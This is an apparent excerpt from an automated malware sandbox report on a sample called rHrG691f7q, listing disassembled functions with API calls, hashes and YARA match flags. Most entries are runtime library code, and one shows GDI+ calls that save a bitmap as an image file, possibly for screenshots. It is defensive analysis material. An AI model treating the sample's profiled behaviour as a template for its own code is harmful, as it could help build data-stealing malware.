                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 00F0C830A10218BBDB109F90DD09B9EFFB4EF05B12F5100B6F805A2290CB799E44CB9C
                                                                                                                                                                                                                                                                    Function 0041CE0D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35threadCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 0041CE21
                                                                                                                                                                                                                                                                    • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 0041CE45
                                                                                                                                                                                                                                                                    • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041CE58
                                                                                                                                                                                                                                                                    • __CxxThrowException@8.LIBVCRUNTIME ref: 0041CE66
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Resource$Concurrency::details::Execution$CurrentException@8Manager::Proxy::RemoveSchedulerThreadThrowstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                                                    • String ID: pScheduler
                                                                                                                                                                                                                                                                    • API String ID: 3657713681-923244539
                                                                                                                                                                                                                                                                    • Opcode ID: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                                                    • Instruction ID: 55b545704ffbdb88c77e4cd2f194ab5b8344582a808f7ff6d102e262485e3fbf
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b7c09c7fa46f95498cdc0359c1e5e1487ada7160e74a5b8724d38a9ce94e1cb3
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7FF05935940714A7C714EA05DC82CDEB3799E90B18760822FE40963282DF3CA98AC29D
                                                                                                                                                                                                                                                                    Function 025008F1 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 34COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: H_prolog3_catchmake_shared
                                                                                                                                                                                                                                                                    • String ID: MOC$RCC$v)D
                                                                                                                                                                                                                                                                    • API String ID: 3472968176-3108830043
                                                                                                                                                                                                                                                                    • Opcode ID: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                                                    • Instruction ID: bd152b798cf6f8a0df14c9356a8a7b29a540e91e1a784b929591004c23cbfb57
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 97e7bd69da2a212c52dfa9d68122ee8a36af56c02b3e00c92559e584b2ae2017
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6BF03CB1A00514DFEB16FB65C84076C3B66BF25B05F468496E441AB2E0CB789A48CFA5
                                                                                                                                                                                                                                                                    Function 0042B106 Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                                                                                                                                                                                                                                    • Instruction ID: bf4f81b698e6ff7fb3fc7778d7bd366b6aaf8ee244f588ee8458200c33ffab4c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6c38956e1fcac5f369ef9c80324371170828598558401bce77602d6080795c3e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7719D31A00366DBCB21CF95E884ABFBB75FF45360F98426AE81097290D7789D41C7E9
                                                                                                                                                                                                                                                                    Function 024EB36D Relevance: 7.7, APIs: 5, Instructions: 222COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID:
                                                                                                                                                                                                                                                                    • Opcode ID: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                                                                                                                                                                                    • Instruction ID: 5fc2b0679644f4f98b17eb1138936cfb410cea8dbf02140d58aa55a824ac31da
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6c6193084eda7c089116deee67986cf6f8c182de1deee36b40da2a445f3b6d2
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D171B5719002169BEF21CF59C884ABFBB75FF4572EF64466BE41367280DB708942CBA1
                                                                                                                                                                                                                                                                    Function 00430A44 Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                      • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00430B4F
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00430B66
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00430B85
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00430BA0
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00430BB7
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3033488037-0
                                                                                                                                                                                                                                                                    • Opcode ID: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                                                                                                                                                                                                                                    • Instruction ID: f55d0931b52299485a7a2c2bc17b7062c97d80267fd2ec389340ea5f3bc65001
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4b14be92388a641d302b0d73df062879f9d592ea064aecebb9857b6d72074d0e
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1B51E171A00304AFEB21AF69D851B6BB7F5EF5C724F14166EE809D7250E739E9018B88
                                                                                                                                                                                                                                                                    Function 024F0CAB Relevance: 7.7, APIs: 5, Instructions: 187COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free$AllocateHeap
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3033488037-0
                                                                                                                                                                                                                                                                    • Opcode ID: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                                                                                                                                                                                    • Instruction ID: a1d7f9c6ac35f1cf8b87ceeeb3d2430f2b419e7d626d5d2ff3ddd80ffd887a0f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e6a1cd199720be507b115cfcd6438e99282708a3fba9711a6543aa0e9cd6d86a
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9551A072A00305AFDBA19F2AD841B6BB7F5EFC8724B14156EEA09D7255E731E901CB80
                                                                                                                                                                                                                                                                    Function 004314DB Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                                                    • Instruction ID: a8a3d8b7f400355b52e94c2f1cdfa5b65e8520eb193c97cf831389b305dd6f12
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C641C332A00204AFCB10DF79C981A5EB7F5EF89718F25456AE616EB391DB35ED01CB84
                                                                                                                                                                                                                                                                    Function 024F1742 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: _free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 269201875-0
                                                                                                                                                                                                                                                                    • Opcode ID: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                                                    • Instruction ID: bc61ed7c781782cb2f9cb14b803ddee5f6add24aa248f1772753f32055a27a18
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1c99ce021355179fcddcfd06fb8a158a48e66a022eb351b43cbd83f2af86aab5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: D641DE36A00204DFDB60DF79C980A9EB7E6EF89714F1545AADA19EB381D731E901CB80
                                                                                                                                                                                                                                                                    Function 0043689D Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,23E85006,0042D0FA,00000000,00000000,0042D938,?,0042D938,?,00000001,0042D0FA,23E85006,00000001,0042D938,0042D938), ref: 004368EA
                                                                                                                                                                                                                                                                    • __alloca_probe_16.LIBCMT ref: 00436922
                                                                                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00436973
                                                                                                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00436985
                                                                                                                                                                                                                                                                    • __freea.LIBCMT ref: 0043698E
                                                                                                                                                                                                                                                                      • Part of subcall function 004336A7: RtlAllocateHeap.NTDLL(00000000,0040D870,00000000,?,0042679E,00000002,00000000,00000000,00000000,?,0040CD21,0040D870,00000004,00000000,00000000,00000000), ref: 004336D9
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 313313983-0
                                                                                                                                                                                                                                                                    • Opcode ID: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                                                                                                                                                                                    • Instruction ID: 7e388e7d71fb0b77ac45b15fa9433514929e8a136d1dde51ddb927b45f4c022b
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 9c34806f26188793042e586e0c43cfd4b91246b94106e2b49bc92d76a4d51be1
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: AF310372A1020AABDF259F65CC41EAF7BA5EF48710F15422AFC04D7250E739CD54CB94
                                                                                                                                                                                                                                                                    Function 0041AEC6 Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _SpinWait.LIBCONCRT ref: 0041AEEB
                                                                                                                                                                                                                                                                      • Part of subcall function 00410F21: _SpinWait.LIBCONCRT ref: 00410F39
                                                                                                                                                                                                                                                                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 0041AEFF
                                                                                                                                                                                                                                                                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 0041AF31
                                                                                                                                                                                                                                                                    • List.LIBCMT ref: 0041AFB4
                                                                                                                                                                                                                                                                    • List.LIBCMT ref: 0041AFC3
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3281396844-0
                                                                                                                                                                                                                                                                    • Opcode ID: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                                                                                                                                                                                                                    • Instruction ID: 46db479fd15f51553f338c6c2feaa856f28efda07e700d063999dccf6460c254
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 56ae1a35d5e220295b2f308ff1a5f56c228e1c53cf17de30109191e3b59696cb
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 32316A71902755DFCB14EFA5D5415EEB7B1BF04308F04406FE40167242DB7869A6CB9A
                                                                                                                                                                                                                                                                    Function 024DB12D Relevance: 7.6, APIs: 5, Instructions: 88COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • _SpinWait.LIBCONCRT ref: 024DB152
                                                                                                                                                                                                                                                                      • Part of subcall function 024D1188: _SpinWait.LIBCONCRT ref: 024D11A0
                                                                                                                                                                                                                                                                    • Concurrency::details::ContextBase::ClearAliasTable.LIBCONCRT ref: 024DB166
                                                                                                                                                                                                                                                                    • Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 024DB198
                                                                                                                                                                                                                                                                    • List.LIBCMT ref: 024DB21B
                                                                                                                                                                                                                                                                    • List.LIBCMT ref: 024DB22A
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ListSpinWait$AcquireAliasBase::ClearConcurrency::details::Concurrency::details::_ContextLock::_ReaderTableWriteWriter
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3281396844-0
                                                                                                                                                                                                                                                                    • Opcode ID: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                                                                                                                                                                                                                                    • Instruction ID: fe81078b9b9c93e447e2a370094fa9cdf0579522588042eb0364f93c55b3571f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f93c24b8a1523b9c675fef23dd34f18a22eb4e590b311a59263b58b7b5af817c
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 95314332A00656EFCB16EFA5C9A06EEBBB2FF05348F06406FC8156B641CB716904CF94
                                                                                                                                                                                                                                                                    Function 00402038 Relevance: 7.6, APIs: 5, Instructions: 80memoryfilewindowCOMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0040206A
                                                                                                                                                                                                                                                                    • GdipAlloc.GDIPLUS(00000010), ref: 00402072
                                                                                                                                                                                                                                                                    • GdipCreateBitmapFromHBITMAP.GDIPLUS(?,00000000,?), ref: 0040208D
                                                                                                                                                                                                                                                                    • GdipSaveImageToFile.GDIPLUS(?,?,?,00000000), ref: 004020B7
                                                                                                                                                                                                                                                                    • GdiplusShutdown.GDIPLUS(?), ref: 004020E3
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Gdip$Gdiplus$AllocBitmapCreateFileFromImageSaveShutdownStartup
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2357751836-0
                                                                                                                                                                                                                                                                    • Opcode ID: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                                                                                                                                                                                                                                    • Instruction ID: 6785f0869033a78d9e1d3ccf4ec12d3ecd4d06d6a9d1a5793ffee6b17630f5bc
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7108b4cc340b01935fd58cf7ceb6a2c11427f9f8c33d4fbb604f736708c6336b
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 522151B5A0131AAFCB00DF65DD499AFBBB9FF49741B104436E902F3290D7759901CBA8
                                                                                                                                                                                                                                                                    Function 024C50C6 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 024C50A3
                                                                                                                                                                                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024C50B7
                                                                                                                                                                                                                                                                    • std::_Locinfo::_Locinfo.LIBCPMT ref: 024C511C
                                                                                                                                                                                                                                                                    • __Getcoll.LIBCPMT ref: 024C512B
                                                                                                                                                                                                                                                                    • std::_Locinfo::~_Locinfo.LIBCPMT ref: 024C513B
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: Locinfostd::_$Locinfo::_Locinfo::~_$Getcoll
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 2395760641-0
                                                                                                                                                                                                                                                                    • Opcode ID: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                                                                                                                                                                                                                                    • Instruction ID: de9c2bc6a11be69392f590823a0bfb6d92b63c10ce212484ea812e8f40420d8f
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 25fabf1443c9e93ed9a78f139e393b4244179813a50fca4ea195eeec06d8ece5
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 48219A79814204AFDB91EFA9C4847DDB7B1BF50725F60805FE085AB280DBB49544CF95
                                                                                                                                                                                                                                                                    Function 00431F5E Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,0042EACE,00434D7C,?,00431F08,00000001,00000364,?,0042DFE5,00457910,00000010), ref: 00431F63
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431F98
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431FBF
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 00431FCC
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 00431FD5
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                    • Opcode ID: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                                                                                                                                                                                    • Instruction ID: 0958b0acb89a9b0c851ef96239832ae32a3192186555c964954bc496c6487c7c
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0d5363e4b9499eccdb5c1a3a84b8776c6d310bab5e63f5db74e86071099be707
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EA01F936249A007BD7122B266C45D2B262DEBD977AF21212FF804933F2EF6C8D02412D
                                                                                                                                                                                                                                                                    Function 024F21C5 Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(024CDAD7,024CDAD7,00000002,024EED35,024F3951,00000000,?,024E6A05,00000002,00000000,00000000,00000000,?,024CCF88,024CDAD7,00000004), ref: 024F21CA
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F21FF
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F2226
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,024CDAD7), ref: 024F2233
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,?,024CDAD7), ref: 024F223C
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_24c0000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Yara matches
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                    • Opcode ID: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                                                                                                                                                                                    • Instruction ID: 67eb15a8c27e797031767cf46085695d9e825339a492581aabc2770ac0c88d8e
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 868f3b611709ec7aceee6e1f81eadbb74bd3caefd1ad767be0b3b05927239706
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7F01F936245B017BD392AB355C44E1B262EABC1B72712013FFF15A6391EFF08802852A
                                                                                                                                                                                                                                                                    Function 00431EDA Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431F11
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 00431F39
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 00431F46
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000), ref: 00431F52
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4622755016.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_rHrG691f7q.jbxd
                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                                                                                                                                                    • Opcode ID: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                                                                                                                                                                                    • Instruction ID: 3b026b3c5eee41f9d7def55204e2a076619a9c86630fc827cc9980c008d650a8
                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0ea10201b8900650499f2260cce22e5252e42022a6a0cd3438f6e6f2aed072af
                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6BF02D3A608A0077D61637356C06B1B26199FC9B26F31112FF815933F2EF2DC902452D
                                                                                                                                                                                                                                                                    Function 024F2141 Relevance: 7.6, APIs: 5, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,?,024EA9EC,?,00000000,?,024ECDE6,024C247E,00000000,?,00451F20), ref: 024F2145
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F2178
                                                                                                                                                                                                                                                                    • _free.LIBCMT ref: 024F21A0
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21AD
                                                                                                                                                                                                                                                                    • SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024F21B9
                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                    • Source File: 00000000.00000002.4623292394.00000000024C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 024C0000, based on PE: false
